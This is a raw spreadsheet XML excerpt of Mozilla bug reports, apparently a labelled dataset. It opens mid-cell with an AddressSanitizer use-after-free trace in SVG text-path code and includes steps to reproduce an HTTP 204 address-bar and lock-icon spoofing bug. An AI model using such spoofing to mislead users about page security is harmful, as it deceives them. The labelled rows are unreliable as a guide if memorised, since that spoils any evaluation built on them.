    #27 0x7ffa373c0cb2 in mozilla::PresShell::ProcessReflowCommands(bool) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:9769
    #28 0x7ffa373be9c4 in mozilla::PresShell::DoFlushPendingNotifications(struct mozilla::ChangesToFlush) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:4259
    #29 0x7ffa3732354e in mozilla::PresShell::FlushPendingNotifications /builds/worker/workspace/obj-build/dist/include/mozilla/PresShell.h:1436
    #30 0x7ffa3732354e in nsRefreshDriver::Tick(struct mozilla::layers::BaseTransactionId&lt;class mozilla::VsyncIdType&gt;, class mozilla::TimeStamp, enum nsRefreshDriver::IsExtraTick) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:2398
    #31 0x7ffa3733a173 in mozilla::RefreshDriverTimer::TickDriver /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:354
    #32 0x7ffa3733a173 in mozilla::RefreshDriverTimer::TickRefreshDrivers(struct mozilla::layers::BaseTransactionId&lt;class mozilla::VsyncIdType&gt;, class mozilla::TimeStamp, class nsTArray&lt;class RefPtr&lt;class nsRefreshDriver&gt;&gt; &amp;) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:331
    #33 0x7ffa37339d6a in mozilla::RefreshDriverTimer::Tick(struct mozilla::layers::BaseTransactionId&lt;class mozilla::VsyncIdType&gt;, class mozilla::TimeStamp) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:347
    #34 0x7ffa37339883 in mozilla::VsyncRefreshDriverTimer::RunRefreshDrivers(struct mozilla::layers::BaseTransactionId&lt;class mozilla::VsyncIdType&gt;, class mozilla::TimeStamp) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:782
    #35 0x7ffa37338b13 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(struct mozilla::layers::BaseTransactionId&lt;class mozilla::VsyncIdType&gt;, class mozilla::TimeStamp) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:705
    #36 0x7ffa37337958 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyParentProcessVsync(void) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:622
    #37 0x7ffa37336f1e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(struct mozilla::VsyncEvent const &amp;) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:543
    #38 0x7ffa35fe73d9 in mozilla::dom::VsyncChild::RecvNotify(struct mozilla::VsyncEvent const &amp;, float const &amp;) /builds/worker/checkouts/gecko/dom/ipc/VsyncChild.cpp:68
    #39 0x7ffa2f4d65b4 in mozilla::dom::PVsyncChild::OnMessageReceived(class IPC::Message const &amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PVsyncChild.cpp:178
    #40 0x7ffa2f25ebff in mozilla::ipc::PBackgroundChild::OnMessageReceived(class IPC::Message const &amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PBackgroundChild.cpp:6207
    #41 0x7ffa2ee1a514 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(class mozilla::ipc::ActorLifecycleProxy *, class IPC::Message const &amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2043
    #42 0x7ffa2ee1683f in mozilla::ipc::MessageChannel::DispatchMessage(class IPC::Message &amp;&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1968
    #43 0x7ffa2ee186bc in mozilla::ipc::MessageChannel::RunMessage(class mozilla::ipc::MessageChannel::MessageTask &amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1827
    #44 0x7ffa2ee18c68 in mozilla::ipc::MessageChannel::MessageTask::Run(void) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1855
    #45 0x7ffa2da116ed in mozilla::RunnableTask::Run(void) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #46 0x7ffa2d9c7a23 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(class mozilla::detail::BaseAutoLock&lt;class mozilla::Mutex &amp;&gt; const &amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #47 0x7ffa2d9c3e8c in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(class mozilla::detail::BaseAutoLock&lt;class mozilla::Mutex &amp;&gt; const &amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #48 0x7ffa2d9c484e in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390
    #49 0x7ffa2da1b741 in mozilla::TaskController::InitializeInternal::&lt;unnamed-tag&gt;::operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:123
    #50 0x7ffa2da1b741 in mozilla::detail::RunnableFunction&lt;`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:123:7'&gt;::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:531
    #51 0x7ffa2d9f1995 in nsThread::ProcessNextEvent(bool, bool *) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1151
    #52 0x7ffa2da02c2c in NS_ProcessNextEvent(class nsIThread *, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
    #53 0x7ffa2ee239ae in mozilla::ipc::MessagePump::Run(class base::MessagePump::Delegate *) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #54 0x7ffa2ed2f415 in MessageLoop::RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331
    #55 0x7ffa2ed2f415 in MessageLoop::RunHandler(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #56 0x7ffa2ed2f1e5 in MessageLoop::Run(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #57 0x7ffa36b1f78a in nsBaseAppShell::Run(void) /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137
    #58 0x7ffa36d1e08b in nsAppShell::Run(void) /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:603
    #59 0x7ffa3b02d9b4 in XRE_RunAppShell(void) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:917
    #60 0x7ffa2ed2f415 in MessageLoop::RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331
    #61 0x7ffa2ed2f415 in MessageLoop::RunHandler(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #62 0x7ffa2ed2f1e5 in MessageLoop::Run(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #63 0x7ffa3b02cf19 in XRE_InitChildProcess(int, char **const, struct XREChildData const *) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:749
    #64 0x7ff707b81d39 in content_process_main /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:58
    #65 0x7ff707b81d39 in NS_internal_main(int, char **, char **) /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
    #66 0x7ff707b814d4 in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:131
    #67 0x7ff707c7e747 in invoke_main d:\agent\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:90
    #68 0x7ff707c7e747 in __scrt_common_main_seh d:\agent\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #69 0x7ffa72f37033  (C:\WINDOWS\System32\KERNEL32.DLL+0x180017033)
    #70 0x7ffa73642650  (C:\WINDOWS\SYSTEM32\ntdll.dll+0x180052650)
0x11e0b8ee8f08 is located 8 bytes inside of 120-byte region [0x11e0b8ee8f00,0x11e0b8ee8f78)
freed by thread T0 here:
    #0 0x7ffa43d55bdb in free Z:\task_163283270682301\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cpp:82
    #1 0x7ffa37bae2da in operator delete /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:51
    #2 0x7ffa37bae2da in mozilla::SVGTextPathObserver::`scalar deleting dtor'(unsigned int) /builds/worker/checkouts/gecko/layout/svg/SVGObserverUtils.cpp:967
    #3 0x7ffa3741d17d in mozilla::FrameProperties::PropertyValue::DestroyValueFor /builds/worker/checkouts/gecko/layout/base/FrameProperties.h:325
    #4 0x7ffa3741d17d in mozilla::FrameProperties::RemoveAll(class nsIFrame const *) /builds/worker/checkouts/gecko/layout/base/FrameProperties.h:256
    #5 0x7ffa373ab0fc in nsIFrame::RemoveAllProperties /builds/worker/workspace/obj-build/dist/include/nsIFrame.h:4224
    #6 0x7ffa373ab0fc in mozilla::PresShell::NotifyDestroyingFrame(class nsIFrame *) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:2216
    #7 0x7ffa377fd70e in nsIFrame::DestroyFrom(class nsIFrame *, struct mozilla::layout::PostFrameDestroyData &amp;) /builds/worker/checkouts/gecko/layout/generic/nsIFrame.cpp:883
    #8 0x7ffa37607fe6 in nsContainerFrame::DestroyFrom(class nsIFrame *, struct mozilla::layout::PostFrameDestroyData &amp;) /builds/worker/checkouts/gecko/layout/generic/nsContainerFrame.cpp:298
    #9 0x7ffa37645034 in nsBlockFrame::DoRemoveFrameInternal(class nsIFrame *, unsigned int, struct mozilla::layout::PostFrameDestroyData &amp;) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:6336
    #10 0x7ffa37647441 in nsBlockFrame::DoRemoveFrame /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.h:544
    #11 0x7ffa37647441 in nsBlockFrame::DeleteNextInFlowChild(class nsIFrame *, bool) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:6557
    #12 0x7ffa378e1017 in nsLineLayout::ReflowFrame(class nsIFrame *, class nsReflowStatus &amp;, class mozilla::ReflowOutput *, bool &amp;) /builds/worker/checkouts/gecko/layout/generic/nsLineLayout.cpp:1016
    #13 0x7ffa37639487 in nsBlockFrame::ReflowInlineFrame(class mozilla::BlockReflowInput &amp;, class nsLineLayout &amp;, class nsLineList_iterator, class nsIFrame *, enum LineReflowStatus *) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:4565
    #14 0x7ffa37637d42 in nsBlockFrame::DoReflowInlineFrames(class mozilla::BlockReflowInput &amp;, class nsLineLayout &amp;, class nsLineList_iterator, struct nsFlowAreaRect &amp;, int &amp;, struct nsFloatManager::SavedState *, bool *, enum LineReflowStatus *, bool) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:4367
    #15 0x7ffa376301ff in nsBlockFrame::ReflowInlineFrames(class mozilla::BlockReflowInput &amp;, class nsLineList_iterator, bool *) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:4252
    #16 0x7ffa37628509 in nsBlockFrame::ReflowLine(class mozilla::BlockReflowInput &amp;, class nsLineList_iterator, bool *) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:3229
    #17 0x7ffa3761b904 in nsBlockFrame::ReflowDirtyLines(class mozilla::BlockReflowInput &amp;) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:2763
    #18 0x7ffa37611a8d in nsBlockFrame::Reflow(class nsPresContext *, class mozilla::ReflowOutput &amp;, struct mozilla::ReflowInput const &amp;, class nsReflowStatus &amp;) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:1394
    #19 0x7ffa37ba8c5c in mozilla::SVGTextFrame::DoReflow(void) /builds/worker/checkouts/gecko/layout/svg/SVGTextFrame.cpp:5122
    #20 0x7ffa37b8af48 in mozilla::SVGTextFrame::MaybeReflowAnonymousBlockChild(void) /builds/worker/checkouts/gecko/layout/svg/SVGTextFrame.cpp:5063
    #21 0x7ffa37b52584 in mozilla::SVGTextFrame::ReflowSVGNonDisplayText /builds/worker/checkouts/gecko/layout/svg/SVGTextFrame.cpp:2850
    #22 0x7ffa37b52584 in mozilla::SVGTextPathObserver::OnRenderingChange(void) /builds/worker/checkouts/gecko/layout/svg/SVGObserverUtils.cpp:502
    #23 0x7ffa37b57d79 in mozilla::SVGRenderingObserver::OnNonDOMMutationRenderingChange /builds/worker/checkouts/gecko/layout/svg/SVGObserverUtils.cpp:247
    #24 0x7ffa37b57d79 in mozilla::SVGRenderingObserverSet::InvalidateAll(void) /builds/worker/checkouts/gecko/layout/svg/SVGObserverUtils.cpp:1066
previously allocated by thread T0 here:
    #0 0x7ffa43d55ceb in malloc Z:\task_163283270682301\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cpp:98
    #1 0x7ffa4bfc154d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7ffa37b5c6c3 in operator new /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:33
    #3 0x7ffa37b5c6c3 in mozilla::GetEffectProperty /builds/worker/checkouts/gecko/layout/svg/SVGObserverUtils.cpp:1165
    #4 0x7ffa37b5c6c3 in mozilla::SVGObserverUtils::GetAndObserveTextPathsPath(class nsIFrame *) /builds/worker/checkouts/gecko/layout/svg/SVGObserverUtils.cpp:1420
    #5 0x7ffa37ba22f4 in mozilla::SVGTextFrame::GetTextPath(class nsIFrame *) /builds/worker/checkouts/gecko/layout/svg/SVGTextFrame.cpp:4542
    #6 0x7ffa37ba3276 in mozilla::SVGTextFrame::DoTextPathLayout(void) /builds/worker/checkouts/gecko/layout/svg/SVGTextFrame.cpp:4609
    #7 0x7ffa37ba7b3e in mozilla::SVGTextFrame::DoGlyphPositioning(void) /builds/worker/checkouts/gecko/layout/svg/SVGTextFrame.cpp:4954
    #8 0x7ffa37b05ae0 in mozilla::SVGContainerFrame::ReflowSVGNonDisplayText(class nsIFrame *) /builds/worker/checkouts/gecko/layout/svg/SVGContainerFrame.cpp:114
    #9 0x7ffa37b05b70 in mozilla::SVGContainerFrame::ReflowSVGNonDisplayText(class nsIFrame *) /builds/worker/checkouts/gecko/layout/svg/SVGContainerFrame.cpp:119
    #10 0x7ffa37b638e7 in mozilla::SVGOuterSVGFrame::Reflow(class nsPresContext *, class mozilla::ReflowOutput &amp;, struct mozilla::ReflowInput const &amp;, class nsReflowStatus &amp;) /builds/worker/checkouts/gecko/layout/svg/SVGOuterSVGFrame.cpp:456
    #11 0x7ffa378e055a in nsLineLayout::ReflowFrame(class nsIFrame *, class nsReflowStatus &amp;, class mozilla::ReflowOutput *, bool &amp;) /builds/worker/checkouts/gecko/layout/generic/nsLineLayout.cpp:875
    #12 0x7ffa37639487 in nsBlockFrame::ReflowInlineFrame(class mozilla::BlockReflowInput &amp;, class nsLineLayout &amp;, class nsLineList_iterator, class nsIFrame *, enum LineReflowStatus *) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:4565
    #13 0x7ffa37637d42 in nsBlockFrame::DoReflowInlineFrames(class mozilla::BlockReflowInput &amp;, class nsLineLayout &amp;, class nsLineList_iterator, struct nsFlowAreaRect &amp;, int &amp;, struct nsFloatManager::SavedState *, bool *, enum LineReflowStatus *, bool) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:4367
    #14 0x7ffa376301ff in nsBlockFrame::ReflowInlineFrames(class mozilla::BlockReflowInput &amp;, class nsLineList_iterator, bool *) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:4252
    #15 0x7ffa37628509 in nsBlockFrame::ReflowLine(class mozilla::BlockReflowInput &amp;, class nsLineList_iterator, bool *) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:3229
    #16 0x7ffa3761b904 in nsBlockFrame::ReflowDirtyLines(class mozilla::BlockReflowInput &amp;) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:2763
    #17 0x7ffa37611a8d in nsBlockFrame::Reflow(class nsPresContext *, class mozilla::ReflowOutput &amp;, struct mozilla::ReflowInput const &amp;, class nsReflowStatus &amp;) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:1394
    #18 0x7ffa37635988 in nsBlockReflowContext::ReflowBlock(class mozilla::LogicalRect const &amp;, bool, struct nsCollapsingMargin &amp;, int, bool, class nsLineBox *, struct mozilla::ReflowInput &amp;, class nsReflowStatus &amp;, class mozilla::BlockReflowInput &amp;) /builds/worker/checkouts/gecko/layout/generic/nsBlockReflowContext.cpp:288
    #19 0x7ffa3762b68d in nsBlockFrame::ReflowBlockFrame(class mozilla::BlockReflowInput &amp;, class nsLineList_iterator, bool *) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:3886
    #20 0x7ffa376286b9 in nsBlockFrame::ReflowLine(class mozilla::BlockReflowInput &amp;, class nsLineList_iterator, bool *) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:3226
```</t>
        </is>
      </c>
      <c r="X5349" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5350">
      <c r="A5350" t="n">
        <v>276720</v>
      </c>
      <c r="B5350" t="inlineStr">
        <is>
          <t>2005-01-01 18:34:56 -0800</t>
        </is>
      </c>
      <c r="C5350" t="inlineStr">
        <is>
          <t>wrong behavior with "http/1.1 204 no content"</t>
        </is>
      </c>
      <c r="D5350" t="inlineStr">
        <is>
          <t>2007-04-01 14:27:57 -0700</t>
        </is>
      </c>
      <c r="E5350" t="n">
        <v>1</v>
      </c>
      <c r="F5350" t="n">
        <v>1</v>
      </c>
      <c r="G5350" t="n">
        <v>3</v>
      </c>
      <c r="H5350" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5350" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5350" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5350" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5350" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5350" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5350" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5350" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5350" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q5350" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5350" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5350" t="inlineStr">
        <is>
          <t>mozilla1.8beta1</t>
        </is>
      </c>
      <c r="T5350" t="n">
        <v>1</v>
      </c>
      <c r="U5350" t="n">
        <v>0</v>
      </c>
      <c r="V5350" t="n">
        <v>19</v>
      </c>
      <c r="W5350" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041217
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041217
If a website returns a "Http/1.1 204 No Content" header to the browser, Mozilla
will not replace the page you were visiting. However, the browser will display
the new address in the address bar.
So, if you are visiting http://whateversite.com and then you click on a link to
https://nexus.passport.com/, Mozilla will display "https://nexus.passport.com/"
in your address bar. Mozilla will also display a lock icon in the status bar. If
you double-click on the lock, Mozilla will display a dialog box saying :
"The website whateversite.com supports authentication for the page you are
visiting..."
If you click on the View button, Mozilla shows nexus.passport.com's certificate.
Firefox goes even further by highlighting the address bar and adding a lock icon
near the address. A lock is also added to the status bar beside the string 
"whateversite.com".
I will post a screenshot later.
I could confirm this bug in Firefox 1.0 and Mozilla 1.7.5.
Reproducible: Always
Steps to Reproduce:
1. Go to www.mozilla.org for instance.
2. In your address bar, type the URI of any page who returns a HTTP 204 header.
   (I recommend you to use a HTTPS page)
3. Look at your address bar, check the status bar for a lock icon.
Actual Results:  
Mozilla kept the "204" URI in the address bar, but added lock icons to the
interface.
Expected Results:  
Mozilla should update the URL to match the one of the web page visited by the
user. It should not add locks saying that the content is secure.</t>
        </is>
      </c>
      <c r="X5350" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5351">
      <c r="A5351" t="n">
        <v>699582</v>
      </c>
      <c r="B5351" t="inlineStr">
        <is>
          <t>2011-11-03 14:35:45 -0700</t>
        </is>
      </c>
      <c r="C5351" t="inlineStr">
        <is>
          <t>Doing virus scans shouldn't kill stage</t>
        </is>
      </c>
      <c r="D5351" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5351" t="n">
        <v>1</v>
      </c>
      <c r="F5351" t="n">
        <v>1</v>
      </c>
      <c r="G5351" t="n">
        <v>5</v>
      </c>
      <c r="H5351" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5351" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5351" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5351" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5351" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5351" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5351" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5351" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5351" t="inlineStr">
        <is>
          <t>[release][automation]</t>
        </is>
      </c>
      <c r="Q5351" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5351" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5351" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5351" t="n">
        <v>1</v>
      </c>
      <c r="U5351" t="n">
        <v>0</v>
      </c>
      <c r="V5351" t="n">
        <v>8</v>
      </c>
      <c r="W5351" t="inlineStr">
        <is>
          <t>One virus scann job will slow down the ability to rsync out changes to mirrors, presumably by causing a lot of I/O on the netapp. We should figure out how we can make the scanning less resource intensive - bug 699579 is one approach to help with CPU, but probably doesn't help with the network load (still have to grab the files to extract them locally).
We should also add locking so that we don't try to run more than one job at a time.</t>
        </is>
      </c>
      <c r="X5351" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5352">
      <c r="A5352" t="n">
        <v>53907</v>
      </c>
      <c r="B5352" t="inlineStr">
        <is>
          <t>2000-09-23 13:12:11 -0700</t>
        </is>
      </c>
      <c r="C5352" t="inlineStr">
        <is>
          <t>New Linux Installer bits for Java 2 support</t>
        </is>
      </c>
      <c r="D5352" t="inlineStr">
        <is>
          <t>2008-07-31 02:11:25 -0700</t>
        </is>
      </c>
      <c r="E5352" t="n">
        <v>1</v>
      </c>
      <c r="F5352" t="n">
        <v>1</v>
      </c>
      <c r="G5352" t="n">
        <v>2</v>
      </c>
      <c r="H5352" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5352" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5352" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K5352" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5352" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5352" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5352" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5352" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5352" t="inlineStr">
        <is>
          <t>[nsbeta3++][rtm+] Reviewed and approved fix in hand</t>
        </is>
      </c>
      <c r="Q5352" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5352" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5352" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T5352" t="n">
        <v>1</v>
      </c>
      <c r="U5352" t="n">
        <v>2</v>
      </c>
      <c r="V5352" t="n">
        <v>42</v>
      </c>
      <c r="W5352" t="inlineStr">
        <is>
          <t>Linux Java 2 bits are ready for PR 3.  They are delivered in a similar form to 
PR 2, with small modifications:
* This deliverable is the JRE only; the PR 2 deliverable handed to Netscape was 
a full JDK.  This deliverable is smaller.
* This deliverable must not be modified (i.e., remove files from the JRE 
distribution).  Java Software informs that this will make it not a real JRE.
Instructions for installation:
* Take the binary tar.gz ball and make it into a .xpi.
* When the installer installs it, installer may unpack the thing anywhere it 
wants to.
* After unpacking the JRE, browser installer must make a symlink from 
$MOZILLA/dist/bin/plugins/libjavaplugin_oji.so to
$JRE/lib/i386/libjavaplugin_oji.so (i.e., actual location of OJI plugin).
The OJI plugin can figure out where the rest of the JRE is from there.
No other installation necessary.  No environment variables, etc.
Questions?  Please send email to drapeau@eng.sun.com.  I hope this is clear; 
please forgive me if not, and I'm happy to try and clarify.</t>
        </is>
      </c>
      <c r="X5352" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5353">
      <c r="A5353" t="n">
        <v>1385518</v>
      </c>
      <c r="B5353" t="inlineStr">
        <is>
          <t>2017-07-28 17:53:54 -0700</t>
        </is>
      </c>
      <c r="C5353" t="inlineStr">
        <is>
          <t>[Photon] Update sidebar styling for dark theme</t>
        </is>
      </c>
      <c r="D5353" t="inlineStr">
        <is>
          <t>2018-10-02 06:29:25 -0700</t>
        </is>
      </c>
      <c r="E5353" t="n">
        <v>1</v>
      </c>
      <c r="F5353" t="n">
        <v>1</v>
      </c>
      <c r="G5353" t="n">
        <v>2</v>
      </c>
      <c r="H5353" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5353" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5353" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K5353" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5353" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5353" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5353" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5353" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5353" t="inlineStr">
        <is>
          <t>[reserve-photon-visual][p3][ntim-intern-project]</t>
        </is>
      </c>
      <c r="Q5353" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5353" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5353" t="inlineStr">
        <is>
          <t>Firefox 64</t>
        </is>
      </c>
      <c r="T5353" t="n">
        <v>1</v>
      </c>
      <c r="U5353" t="n">
        <v>5</v>
      </c>
      <c r="V5353" t="n">
        <v>25</v>
      </c>
      <c r="W5353" t="inlineStr">
        <is>
          <t>Background should be dark.</t>
        </is>
      </c>
      <c r="X5353" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5354">
      <c r="A5354" t="n">
        <v>871431</v>
      </c>
      <c r="B5354" t="inlineStr">
        <is>
          <t>2013-05-12 22:56:15 -0700</t>
        </is>
      </c>
      <c r="C5354" t="inlineStr">
        <is>
          <t>[A/V] Background music playback is jittered while browsing</t>
        </is>
      </c>
      <c r="D5354" t="inlineStr">
        <is>
          <t>2013-06-11 15:25:31 -0700</t>
        </is>
      </c>
      <c r="E5354" t="n">
        <v>1</v>
      </c>
      <c r="F5354" t="n">
        <v>1</v>
      </c>
      <c r="G5354" t="n">
        <v>6</v>
      </c>
      <c r="H5354" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5354" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J5354" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5354" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5354" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5354" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N5354" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5354" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5354" t="inlineStr">
        <is>
          <t>[TD-26228] c=music, MiniWW</t>
        </is>
      </c>
      <c r="Q5354" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5354" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5354" t="inlineStr">
        <is>
          <t>1.1 QE2 (6jun)</t>
        </is>
      </c>
      <c r="T5354" t="n">
        <v>1</v>
      </c>
      <c r="U5354" t="n">
        <v>0</v>
      </c>
      <c r="V5354" t="n">
        <v>24</v>
      </c>
      <c r="W5354" t="inlineStr">
        <is>
          <t>Start music application -&gt; play any mp3 file -&gt; home button -&gt; start browser -&gt; visit any url -&gt; zooming while it loads web page
Then BGM is jittered.
If you visit the page that has lot of media, it can easily reproduced.
Build ID : 20130503155504
Gaia : 5cbb19e4bb78a7ad879fbe4b9a841e1c35714f5c
Gecko : 950b402b6188bb2f3ce3176e620ed5249719d720</t>
        </is>
      </c>
      <c r="X5354" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5355">
